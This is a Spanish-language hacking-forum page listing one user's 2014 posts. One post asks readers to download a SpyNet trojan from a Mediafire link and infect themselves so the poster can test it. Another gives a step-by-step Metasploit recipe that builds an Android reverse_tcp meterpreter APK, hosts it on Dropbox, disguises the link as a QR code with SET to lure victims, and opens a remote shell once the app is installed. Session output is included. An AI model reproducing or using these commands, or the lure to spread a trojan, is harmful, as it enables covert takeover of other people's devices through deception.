elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Análisis y Diseño de Malware / Ayuda Troyano SpyNet en: 13 Agosto 2014, 19:00 pm
Necesito que alguien se infecte para saber si funciona, se lo puede quitar y si funciona se lo desinstalo remotamente, no se si funciona asi que si alguien me puede ayudar que se los baje de aqui: http://www.mediafire.com/download/qgwbn1eg2i563a5/SpyNet_(2).rar


Gracias  ;D
2  Foros Generales / Dudas Generales / Re: Ayuda sobre una web que no encuentro en: 30 Julio 2014, 13:08 pm
Gracias era attrition pero lastima que dejaran el defacement.
3  Foros Generales / Dudas Generales / Re: en: 29 Julio 2014, 20:01 pm
Lo siento esa no era, la web tenia un fondo negro y publicaban sus hacks y una captura de la web hackeada
4  Foros Generales / Noticias / Re: en: 29 Julio 2014, 14:37 pm
Claro que si xD
5  Seguridad Informática / Hacking / Re: Re: quien me pasa un manual de pentesting desde cero? en: 29 Julio 2014, 14:36 pm
El mejor sistema de pentesting es linux así que vete haciendo una idea ;D
6  Seguridad Informática / Bugs y Exploits / Re: en: 29 Julio 2014, 12:04 pm
Usa el w3af scan para buscar alguna vulnerabilidad sqlinject u otra.
7  Seguridad Informática / Bugs y Exploits / Duda sobre metasploit en: 29 Julio 2014, 12:01 pm
Tengo una duda sobre metasploit: ¿Metasploit viene con los últimos exploits gratis hasta la fecha? Y si no yo he intentado poner los de exploit-db pero el metasploit crashea, lo he reinstalado para que volviera a funcionar.Si viene con los últimos exploits ¿De que db se los descarga?
8  Seguridad Informática / Hacking / Re: Re: Bloqueó internet. Como lo logró? en: 29 Julio 2014, 00:14 am
Eso debe ser virus, escanea el pc o busca algún proceso raro. El mas gracioso que he visto es uno del rey xD
9  Foros Generales / Dudas Generales / Ayuda sobre una web que no encuentro en: 28 Julio 2014, 23:58 pm
Hace mucho tiempo encontre una web donde hackers publicaban las webs que hackeaban, no me acuerdo de su nombre ni tampoco consigo resultados ... ¿Alguien tiene idea de que web estoy diciendo????
10  Seguridad Informática / Hacking / Re: ¿Como hago una intrusion a pc desde android? (estando en red) en: 9 Febrero 2014, 16:14 pm
Muy facil con Metasploit y un pc con Ubuntu o una distribucion de linux
root@kali:~# msfupdate
2)Ahora vamos a crear el payload en forma de aplicación apk:
root@kali:~# msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.39 R > /root/prueba.apk
En lhost debemos poner la ip de nuestra interfaz, si no sabemos cual es nuestra ip en ese momento ejecutamos ifconfig y nos aparecerá. Después le indicamos que lo cree en la ruta /root/ (carpeta personal) y que cree un archivo llamado prueba.apk
3)Para hacerlo mas realista subiremos dicho archivo a dropbox por ejemplo, para generar un link de descarga, en mi caso:
https://www.dropbox.com/s/fbq7fg7o8oduxi7/prueba.apk
4) Ahora lo camuflaremos en un codigo QR escaneable para ello usaremos SET de la siguiente forma:
root@kali:~# se-toolkit
set>1
set>9
Enter the URL you want the QRCode to go to:https://www.dropbox.com/s/fbq7fg7o8oduxi7/prueba.apk
Ahora SET nos dice lo siguiente:
  • QRCode has been generated under /root/.set/reports/qrcode_attack.png
Este será el codigo QR el cual al ser escaneado por un dispositivo Android descarga la aplicación prueba.apk
5)Ahora nos pondremos a la escucha para cuando alguien pique:
root@kali:~# msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E
6)En este caso por ser una prueba local usé mi propio teléfono, al abrir la instalación, en la terminal que abrimos en el paso 5, se nos abrirá una sesión de meterpreter con la cual ya podremos jugar a nuestro antojo.

root@kali:~# msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E
  • Initializing modules...
PAYLOAD => android/meterpreter/reverse_tcp
LHOST => 0.0.0.0
  • Started reverse handler on 0.0.0.0:4444
  • Starting the payload handler...
  • Sending stage (39698 bytes) to 192.168.1.37
  • Meterpreter session 1 opened (192.168.1.39:4444 -> 192.168.1.37:52818) at 2013-08-25 14:31:44 +0200
meterpreter > shell
y ya estaremos en la maquina con android en una red local :)
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines